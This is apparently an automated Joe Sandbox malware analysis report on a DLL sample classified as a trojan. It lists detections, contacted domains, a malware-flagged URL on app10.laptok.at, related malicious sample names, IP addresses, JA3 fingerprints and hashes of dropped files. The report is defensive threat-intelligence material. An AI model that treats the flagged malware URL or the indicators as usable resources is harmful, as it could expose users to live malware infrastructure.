                      | a04.dll | 100% | Joe Sandbox ML | |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      | Source | Detection | Scanner | Label |
                      | 3.2.rundll32.exe.32e0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 |
                      | 5.2.rundll32.exe.6b0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 |
                      | 0.2.loaddll32.exe.fc0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 |
                      | 2.2.regsvr32.exe.a70000.0.unpack | 100% | Avira | HEUR/AGEN.1108168 |

                      Domains

                      | Source | Detection | Scanner | Label |
                      | tls13.taboola.map.fastly.net | 0% | Virustotal | |
                      | app10.laptok.at | 13% | Virustotal | |
                      | prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud | 0% | Virustotal | |
                      | a97adde81b00f2ca4.awsglobalaccelerator.com | 0% | Virustotal | |

                      URLs


                      Domains and IPs

                      Contacted Domains


Contacted URLs


URLs from Memory and Binaries

                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://www.twitter.com/msapplication.xml5.4.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://outlook.com/de-ch[1].htm.6.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2{AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.jsoniab2Data[2].json.6.drfalse
                                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://onedrive.live.com/?qt=mru;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://www.msn.com/de-ch/?ocid=iehp{AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://app10.laptok.at/iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbIloaddll32.exe, 00000000.00000003.862593152.0000000001258000.00000004.00000001.sdmp, ~DFBF4FFB19552D8CDC.TMP.4.dr, {E5354AB5-2775-11EC-90EB-ECF4BBEA1588}.dat.4.drtrue
                                                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.6.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://www.msn.com/de-ch/news/other/die-araberinnen-und-araber-kehren-zur%c3%bcck/ar-AAPbaLO?ocid=hde-ch[1].htm.6.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;tde-ch[1].htm.6.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      http://www.nytimes.com/msapplication.xml3.4.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.6.drfalse
                                                                                                                                                                                                                                          high

Contacted IPs

Public


General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 498854
Start date: 07.10.2021
Start time: 15:50:40
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 47s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: a04.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.winDLL@21/140@24/13
EGA Information: Failed
HDC Information:
• Successful, ratio: 31.9% (good quality ratio 30.7%)
• Quality average: 80.5%
• Quality standard deviation: 27.6%
HCA Information:
• Successful, ratio: 69%
• Number of executed functions: 90
• Number of non-executed functions: 58
Cookbook Comments:
                                                                                                                                                                                                                                          • Adjust boot time
                                                                                                                                                                                                                                          • Enable AMSI
                                                                                                                                                                                                                                          • Found application associated with file extension: .dll
                                                                                                                                                                                                                                          • Override analysis time to 240s for rundll32
                                                                                                                                                                                                                                          Warnings:
                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.

                                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                                          Behavior and APIs

Time | Type | Description
15:53:12 | API Interceptor | 1x Sleep call for process: rundll32.exe modified

                                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                                          IPs


                                                                                                                                                                                                                                                                                  Domains


                                                                                                                                                                                                                                                                                  ASN

                                                                                                                                                                                                                                                                                  • 162.159.134.233
                                                                                                                                                                                                                                                                                  TpNBqOquYs.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 162.159.129.233
                                                                                                                                                                                                                                                                                  vhPaw5lCuv.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 172.67.176.216
                                                                                                                                                                                                                                                                                  8VNALsC90G.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 23.227.38.74
                                                                                                                                                                                                                                                                                  BSQ4wRQciB.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 104.18.114.97
                                                                                                                                                                                                                                                                                  5sTWnI5RoC.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 172.67.176.216
                                                                                                                                                                                                                                                                                  u6TjeODCFF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 162.159.133.233
                                                                                                                                                                                                                                                                                  TsozeiN4tT.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 104.26.7.139
                                                                                                                                                                                                                                                                                  3Uzf6tkCcB.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 104.21.17.146
                                                                                                                                                                                                                                                                                  qmskAqQ4H6.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 172.67.131.184
                                                                                                                                                                                                                                                                                  hwIILTIn0n.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 172.67.153.94
                                                                                                                                                                                                                                                                                  kARSx3Wv9S.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 104.21.17.146
                                                                                                                                                                                                                                                                                  AMAZON-02USmips-20211007-1206Get hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 54.126.191.35
                                                                                                                                                                                                                                                                                  A1ORfMfK1I.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.139.111.104
                                                                                                                                                                                                                                                                                  TsozeiN4tT.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  RFQ453266433,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 52.88.142.220
                                                                                                                                                                                                                                                                                  UT3vK4jelb.msiGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 52.95.165.51
                                                                                                                                                                                                                                                                                  l8w9YB1n38.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 99.83.154.118
                                                                                                                                                                                                                                                                                  FedEx_AWB#_224174658447.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 3.64.163.50
                                                                                                                                                                                                                                                                                  CV 10-06-2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 3.123.20.242
                                                                                                                                                                                                                                                                                  3JWv5bYojD.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 3.126.56.137
                                                                                                                                                                                                                                                                                  3JWv5bYojD.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 3.126.56.137
                                                                                                                                                                                                                                                                                  7fC3FgBEeHGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 34.249.145.219
                                                                                                                                                                                                                                                                                  ZXPInstaller.Setup.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 54.249.141.25
                                                                                                                                                                                                                                                                                  svchost.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 13.51.72.213
                                                                                                                                                                                                                                                                                  Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 52.216.166.13
                                                                                                                                                                                                                                                                                  Invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 52.217.141.112
                                                                                                                                                                                                                                                                                  RNIpSzBRVC.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.185.122.198
                                                                                                                                                                                                                                                                                  DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 54.179.71.39
                                                                                                                                                                                                                                                                                  #U266b-Encova-9493556-44518-9493556283243.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 3.139.50.24
                                                                                                                                                                                                                                                                                  RvPCVuHD8fGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 34.249.145.219
                                                                                                                                                                                                                                                                                  USD8390.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 52.217.175.112

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                                                                                                                                                  9e10692f1b7f78228b2d4e424db3a98cTsozeiN4tT.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.195.217.206
                                                                                                                                                                                                                                                                                  • 172.67.69.19
                                                                                                                                                                                                                                                                                  • 18.156.81.187
                                                                                                                                                                                                                                                                                  • 76.223.111.131
                                                                                                                                                                                                                                                                                  • 151.101.1.44
                                                                                                                                                                                                                                                                                  • 104.26.7.139
                                                                                                                                                                                                                                                                                  • 104.20.184.68
                                                                                                                                                                                                                                                                                  • 18.197.99.6
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  • 35.244.174.68
                                                                                                                                                                                                                                                                                  • 142.250.203.98
                                                                                                                                                                                                                                                                                  • 172.217.168.38
                                                                                                                                                                                                                                                                                  3JWv5bYojD.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.195.217.206
                                                                                                                                                                                                                                                                                  • 172.67.69.19
                                                                                                                                                                                                                                                                                  • 18.156.81.187
                                                                                                                                                                                                                                                                                  • 76.223.111.131
                                                                                                                                                                                                                                                                                  • 151.101.1.44
                                                                                                                                                                                                                                                                                  • 104.26.7.139
                                                                                                                                                                                                                                                                                  • 104.20.184.68
                                                                                                                                                                                                                                                                                  • 18.197.99.6
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  • 35.244.174.68
                                                                                                                                                                                                                                                                                  • 142.250.203.98
                                                                                                                                                                                                                                                                                  • 172.217.168.38
                                                                                                                                                                                                                                                                                  3JWv5bYojD.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.195.217.206
Invoice.xlsx (malicious)
yMPBuPqE33.dll (malicious)
jLluep47xI.dll (malicious)
1xjJ6fFB1b.dll (malicious)
TooltabExtension.dll (malicious)
jqzMAYCER2.dll (malicious)
TooltabExtension.dll (malicious)
KHP6cmziNb.dll (malicious)
SBnLImhV6r.dll (malicious)
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  • 35.244.174.68
                                                                                                                                                                                                                                                                                  • 142.250.203.98
                                                                                                                                                                                                                                                                                  • 172.217.168.38
                                                                                                                                                                                                                                                                                  CEKzPxFOmi.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.195.217.206
                                                                                                                                                                                                                                                                                  • 172.67.69.19
                                                                                                                                                                                                                                                                                  • 18.156.81.187
                                                                                                                                                                                                                                                                                  • 76.223.111.131
                                                                                                                                                                                                                                                                                  • 151.101.1.44
                                                                                                                                                                                                                                                                                  • 104.26.7.139
                                                                                                                                                                                                                                                                                  • 104.20.184.68
                                                                                                                                                                                                                                                                                  • 18.197.99.6
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  • 35.244.174.68
                                                                                                                                                                                                                                                                                  • 142.250.203.98
                                                                                                                                                                                                                                                                                  • 172.217.168.38
                                                                                                                                                                                                                                                                                  5ch8dv7ceO.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.195.217.206
                                                                                                                                                                                                                                                                                  • 172.67.69.19
                                                                                                                                                                                                                                                                                  • 18.156.81.187
                                                                                                                                                                                                                                                                                  • 76.223.111.131
                                                                                                                                                                                                                                                                                  • 151.101.1.44
                                                                                                                                                                                                                                                                                  • 104.26.7.139
                                                                                                                                                                                                                                                                                  • 104.20.184.68
                                                                                                                                                                                                                                                                                  • 18.197.99.6
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  • 35.244.174.68
                                                                                                                                                                                                                                                                                  • 142.250.203.98
                                                                                                                                                                                                                                                                                  • 172.217.168.38
                                                                                                                                                                                                                                                                                  0YM5hwP6b3.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.195.217.206
                                                                                                                                                                                                                                                                                  • 172.67.69.19
                                                                                                                                                                                                                                                                                  • 18.156.81.187
                                                                                                                                                                                                                                                                                  • 76.223.111.131
                                                                                                                                                                                                                                                                                  • 151.101.1.44
                                                                                                                                                                                                                                                                                  • 104.26.7.139
                                                                                                                                                                                                                                                                                  • 104.20.184.68
                                                                                                                                                                                                                                                                                  • 18.197.99.6
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  • 35.244.174.68
                                                                                                                                                                                                                                                                                  • 142.250.203.98
                                                                                                                                                                                                                                                                                  • 172.217.168.38
                                                                                                                                                                                                                                                                                  N8OeefFV0T.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.195.217.206
                                                                                                                                                                                                                                                                                  • 172.67.69.19
                                                                                                                                                                                                                                                                                  • 18.156.81.187
                                                                                                                                                                                                                                                                                  • 76.223.111.131
                                                                                                                                                                                                                                                                                  • 151.101.1.44
                                                                                                                                                                                                                                                                                  • 104.26.7.139
                                                                                                                                                                                                                                                                                  • 104.20.184.68
                                                                                                                                                                                                                                                                                  • 18.197.99.6
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  • 35.244.174.68
                                                                                                                                                                                                                                                                                  • 142.250.203.98
                                                                                                                                                                                                                                                                                  • 172.217.168.38
                                                                                                                                                                                                                                                                                  f5rSnwtlOS.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.195.217.206
                                                                                                                                                                                                                                                                                  • 172.67.69.19
                                                                                                                                                                                                                                                                                  • 18.156.81.187
                                                                                                                                                                                                                                                                                  • 76.223.111.131
                                                                                                                                                                                                                                                                                  • 151.101.1.44
                                                                                                                                                                                                                                                                                  • 104.26.7.139
                                                                                                                                                                                                                                                                                  • 104.20.184.68
                                                                                                                                                                                                                                                                                  • 18.197.99.6
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  • 35.244.174.68
                                                                                                                                                                                                                                                                                  • 142.250.203.98
                                                                                                                                                                                                                                                                                  • 172.217.168.38
                                                                                                                                                                                                                                                                                  EQfXW3UETC.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.195.217.206
                                                                                                                                                                                                                                                                                  • 172.67.69.19
                                                                                                                                                                                                                                                                                  • 18.156.81.187
                                                                                                                                                                                                                                                                                  • 76.223.111.131
                                                                                                                                                                                                                                                                                  • 151.101.1.44
                                                                                                                                                                                                                                                                                  • 104.26.7.139
                                                                                                                                                                                                                                                                                  • 104.20.184.68
                                                                                                                                                                                                                                                                                  • 18.197.99.6
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  • 35.244.174.68
                                                                                                                                                                                                                                                                                  • 142.250.203.98
                                                                                                                                                                                                                                                                                  • 172.217.168.38
                                                                                                                                                                                                                                                                                  TvZcNQ8W30.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                                  • 18.195.217.206
                                                                                                                                                                                                                                                                                  • 172.67.69.19
                                                                                                                                                                                                                                                                                  • 18.156.81.187
                                                                                                                                                                                                                                                                                  • 76.223.111.131
                                                                                                                                                                                                                                                                                  • 151.101.1.44
                                                                                                                                                                                                                                                                                  • 104.26.7.139
                                                                                                                                                                                                                                                                                  • 104.20.184.68
                                                                                                                                                                                                                                                                                  • 18.197.99.6
                                                                                                                                                                                                                                                                                  • 18.156.0.31
                                                                                                                                                                                                                                                                                  • 35.244.174.68
                                                                                                                                                                                                                                                                                  • 142.250.203.98
                                                                                                                                                                                                                                                                                  • 172.217.168.38
                                                                                                                                                                                                                                                                                  tb_unpacked_21_10_5.dllGet hashmaliciousBrowse

                                                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):152
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1624866828857074
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:D90aK1ryRtFwsx6wmxvFuqLHIfwEYPJGX7T40AAe9udilDM9qSLYZLKb:JFK1rUFkduqswEkIXH40AAe9uiDMl/b
                                                                                                                                                                                                                                                                                  MD5:9475ADAFC27DB10C95798744D8905AB6
                                                                                                                                                                                                                                                                                  SHA1:E0630FECF0204A847B7456DE19550EA9FBF69BA0
                                                                                                                                                                                                                                                                                  SHA-256:9D195BC343C90A6CA8C0A9F6610DDC29FCC88C81A8FD6F674D0535F993888879
                                                                                                                                                                                                                                                                                  SHA-512:6ED8DABE8C6E33AE9B488D0626CD57B69F4902D3E69FE3C1A94A6508B1F1FE08B5526386F11AB5DB9CEE654D72B54B991F72FF6ADFADE6F08822692C229740BB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <root></root><root><item name="BT_AA_DETECTION" value="{&quot;ab&quot;:false,&quot;acceptable&quot;:true}" ltime="2088788432" htime="30915458" /></root>
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3084
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.957043190419212
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:QRi/Ri/Ri8i8i8i8ifi8itititi0i0i0i0iTi0i0iTi0i0iQwifi0iQwifi0iQMu:QKKZ
                                                                                                                                                                                                                                                                                  MD5:7A37F659DA566B66767688A75F48D04A
                                                                                                                                                                                                                                                                                  SHA1:B2E4AA717B47B4F58BEBFA5F8107799BBBF76C2E
                                                                                                                                                                                                                                                                                  SHA-256:BB18DD5BBA43FB527A9CF239F4090834C9043A1EF8068107F5A3168B975B03A1
                                                                                                                                                                                                                                                                                  SHA-512:9D93D22316563046933CED071C23108B7D765EA40B343F1E16D475ACF0E87F0FE4DC0A66A76406C1D253AEED729F3B922DA7EA39BBE5AF621A489F0D85DA54C2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview: <root></root><root><item name="HBCM_BIDS" value="{}" ltime="2044788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2044788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2044788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2045788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2045788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2045788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2045788432" htime="30915458" /><item name="mntest" value="mntest" ltime="2048788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2045788432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2052268432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2052268432" htime="30915458" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2052268432" htime
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{AE6AEE69-2775-11EC-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):126312
                                                                                                                                                                                                                                                                                  Entropy (8bit):2.2837259049504364
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:r0loN+hi/ryn66yEfJ1qfm7i6Y/8VQB526UL7JZg2t7ysApmZXiY92Xo5Yyl0TDf:J
                                                                                                                                                                                                                                                                                  MD5:6605F18470B8D87FD7FD764D5C502C9A
                                                                                                                                                                                                                                                                                  SHA1:6A2A195C3B0477F0D35CAB5BD5A869DD5A62A8CF
                                                                                                                                                                                                                                                                                  SHA-256:E7F1D289FACE576A2B73D3B6DFBEB93036A728BA318D6B943698230ACAC109F2
                                                                                                                                                                                                                                                                                  SHA-512:9679EE4B205838391CFF28022EC6011D44F246C20029DD024B824519058EAD079239202D28702D600212E1EC86933B3A28B96DF641D686421421F11C22E0DA7B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{078013E1-2776-11EC-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):28136
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.9180111106540512
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:rVZOQi6gBSEjB2aWDM7yUmo3QcNldo3QcjA:rVZOQi6gkEjB2aWDM7yUmFcNldFcjA
                                                                                                                                                                                                                                                                                  MD5:BECF11EC971A658120EDA45C0A19E0F5
                                                                                                                                                                                                                                                                                  SHA1:C086211CD5000E4E923FF2DC9298C8EBEF3CF7BD
                                                                                                                                                                                                                                                                                  SHA-256:644ADCC8A3C54B7E7DA8005AAB91E56E342B5A6992B4701BCABE82B1E47B8D50
                                                                                                                                                                                                                                                                                  SHA-512:9920AA28E0AF7F2C659B19A4939E8FE90D94D64641FC9D2623926E240EDB5230C370B743B3640DD4EF41B2D0FA5D652DBA2EC5FF5FE01BD9E170A30F261E78B6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):211190
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.61606394553613
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:JZ/2Bfc/mu5kgTzXtOZ/2Bfcgmu5kgTzXt8:QsS
                                                                                                                                                                                                                                                                                  MD5:4AF67B62CFBAC5D537204EE4CE24788E
                                                                                                                                                                                                                                                                                  SHA1:7C0793C387212F0B25BFB47FDD3E587EAE9E6122
                                                                                                                                                                                                                                                                                  SHA-256:805F9A42BD9DFAC2E2D3B5C0D597432322C533EBC496877D3A39461DD08C6EDE
                                                                                                                                                                                                                                                                                  SHA-512:DF962852086C39490E591411DB72000C30613EC1067E03E604AEA8BC6EE8D35C25D500D635CFE1757DD3F76501FAB7855AFB13BEC3137BF72FAB2B1479041B22
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B857F74E-2775-11EC-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):19032
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.5858755191782974
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:IwcGcprpGwpa0G4pQkGrapbSWtGQpKlG7HpRMTGIpX2KGApm:rAZDQE6yBSWXAUTYFhg
                                                                                                                                                                                                                                                                                  MD5:B38ED69517B261608B9D472B5026441C
                                                                                                                                                                                                                                                                                  SHA1:A92834236BC5E596AFC5684F7D69F9FE414704B6
                                                                                                                                                                                                                                                                                  SHA-256:AECD40BF646DCAD07A307EDF27C1160702AB256429011F7D514214AD194089B5
                                                                                                                                                                                                                                                                                  SHA-512:7AC68530E56D58089EDD53D7CD0F7EB60300FE03E5B0DA86C093D5C08464175B2831EFCA22F0A0D2F3B9CB8B1B65428CC4E407093060B48B6CA8381831C66E30
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E5354AB5-2775-11EC-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):27592
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.919147838287388
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:rFZaQX6lk3j12hWGMKBpvRBDiPHlpvRBDiPgvPA:rLXquzsQvSpONpOIg
                                                                                                                                                                                                                                                                                  MD5:830B2D899F1B8E845E7B95AFF9D080E1
                                                                                                                                                                                                                                                                                  SHA1:F1BA31E5E378688047B5E09E942F3181E18CD859
                                                                                                                                                                                                                                                                                  SHA-256:4317548CFBE4F71B1FDE7467B18AF08CCF326359612348DC9F742914DCC5A8FB
                                                                                                                                                                                                                                                                                  SHA-512:73BA2DD721F9A5C2E00A45D71CAD5CB03B2042D8282F7DE3C0B0AD10E910BC10E667FCFB6A56306A3809F4EAFF90E55B7E334489760A44A5283B4080BF106648
                                                                                                                                                                                                                                                                                  Malicious:false
